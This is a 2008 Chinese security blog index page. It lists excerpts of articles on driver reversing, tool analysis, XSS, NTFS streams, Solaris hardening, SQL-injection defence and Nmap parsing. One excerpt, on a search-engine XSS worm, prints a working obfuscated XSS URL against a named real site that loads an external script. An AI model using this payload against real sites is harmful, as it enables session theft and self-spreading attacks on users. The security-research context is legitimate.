分类 ‘技术文章’ 下的日志

逆向fuck.sys–编译通过–源码

2008/06/06 21:42 | 鬼仔 | 技术文章 | 1 个回复

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:sudami

前言:
一直很向往进入Debugman论坛的RCT这个核心团队,但自己水平有限,最后没有过关.

呵呵,不过俺从中学到了很多东西,于是发此帖分享一下学习成果;也顺便请教各位大牛,希望您有时间的话,逆一份更加好的code.偶逆的这份code虽然大致实现了原来驱动的功能,但写的毕竟很粗糙,希望有逆向经验的同学能给予部分提示和指导,偶也能从中总结经验和教训,争取在短时间内提高自己,以便下次再申请加入RCT.
阅读全文 »

Tags:

NtGodMode.exe干了什么

2008/06/06 20:18 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔:NtGodMode~.exe

by http://tmdnet.nothave.com

NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe 9.00 KB (9,216 字节) UPX壳,直接用Ollydbg脱壳,过程略
NtGodMode~.exe 120 KB (123,392 字节) 用PE工具查看,delphi写的
阅读全文 »

Tags:

字符集导致的浏览器跨站脚本攻击

2008/06/06 18:08 | 鬼仔 | 技术文章 | 消灭0回复

|=———————————————————————————————–=|
|=—————–=[ 字符集导致的浏览器跨站脚本攻击 ]=—————–=|
|=———————————————————————————————–=|
|=————————————-=[ By jianxin ]=————————————=|
|=——————————-=[ [email protected] ]=—————————-=|
|=————————————————————————————————=|

前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
阅读全文 »

Tags: ,

Search Engine XSS Worm

2008/06/06 13:51 | 鬼仔 | 技术文章 | 消灭0回复

作者:余弦
来源:0x37 Security

有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。译言http://www.yeeyan.com/是一个“发现、翻译、阅读中文之外的互联网精华”的web2.0网站,过滤系统真BT,不过其搜索引擎存在跨站,它的搜索引擎也真够BT,转义单引号、双引号,并且当搜索值含英文冒号:时就不返回搜索结果。于是我只能这样构造:

http://www.yeeyan.com/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%74ring.f%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41))%3C/s%63%72ipt%3E
阅读全文 »

Tags:

科普Solaris系统安全

2008/06/06 1:22 | 鬼仔 | 技术文章 | 消灭0回复

作者:amxku
来源:amxku’s blog

==维护密码和登录控制
==监控系统使用情况
==限制文件访问
==root用户登录
==控制通过网络的远程访问
阅读全文 »

Tags:

NTFS数据流和web安全

2008/06/05 19:56 | 鬼仔 | 技术文章 | 3 个回复

|=———————————————————————————————–=|
|=————————–=[ NTFS数据流和web安全 ]=————————-=|
|=———————————————————————————————–=|
|=————————————-=[ By 80sec ]=————————————=|
|=—————-=[ [email protected]&[email protected] ]=—————–=|
|=————————————————————————————————=|

NTFS流简单介绍:

NTFS因为它的稳定性 强大的功能 以及它所提供的安全性而成为一种更优越的文件系统,NTFS交换数据流(ADSs)是为了和Macintosh的HFS文件系统兼容而设计的,它使用资源 派生(resource forks)来维持与文件相关的信息,比如说图标及其他的东西。创建ADSs的语法相对比较简单和直接,比如说创建和文件myfile.txt相关联的 ADSs,只需简单的用冒号把文件名和ADSs名分开即可如:
阅读全文 »

Tags:

MySQL Proxy(解决注入的另一思路)

2008/06/04 18:21 | 鬼仔 | 技术文章 | 消灭0回复

作者:云舒

What is MySQL Proxy?

MySQL Proxy is a simple program that sits between your client and MySQL server(s) that can monitor, analyze or transform their communication. Its flexibility allows for unlimited uses; common ones include: load balancing; failover; query analysis; query filtering and modification; and many more.

可以看到,MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。这样一种扩展,就给了我让他做别的事情的思路——防止注入攻击。
阅读全文 »

Tags: , ,

Perl分析Nmap结果之二

2008/06/04 18:17 | 鬼仔 | 技术文章 | 消灭0回复

作者:云舒

很久之前写过一个简单的分析nmap结果的perl脚本,http://icylife.net/yunshu/show.php?id=446,似乎是07年夏天吧。这几天因为一点小需求做了个稍微复杂一点的,可对端口的服务以及版本做一个简单的判断。

代码很简单,就是用hash保存了端口和服务的对应,服务和最新版本的对应,然后判断扫描的结果是否符合预定义的情况。因为没几行,所以就没什么注释了,看看就明白了。
阅读全文 »

Tags: ,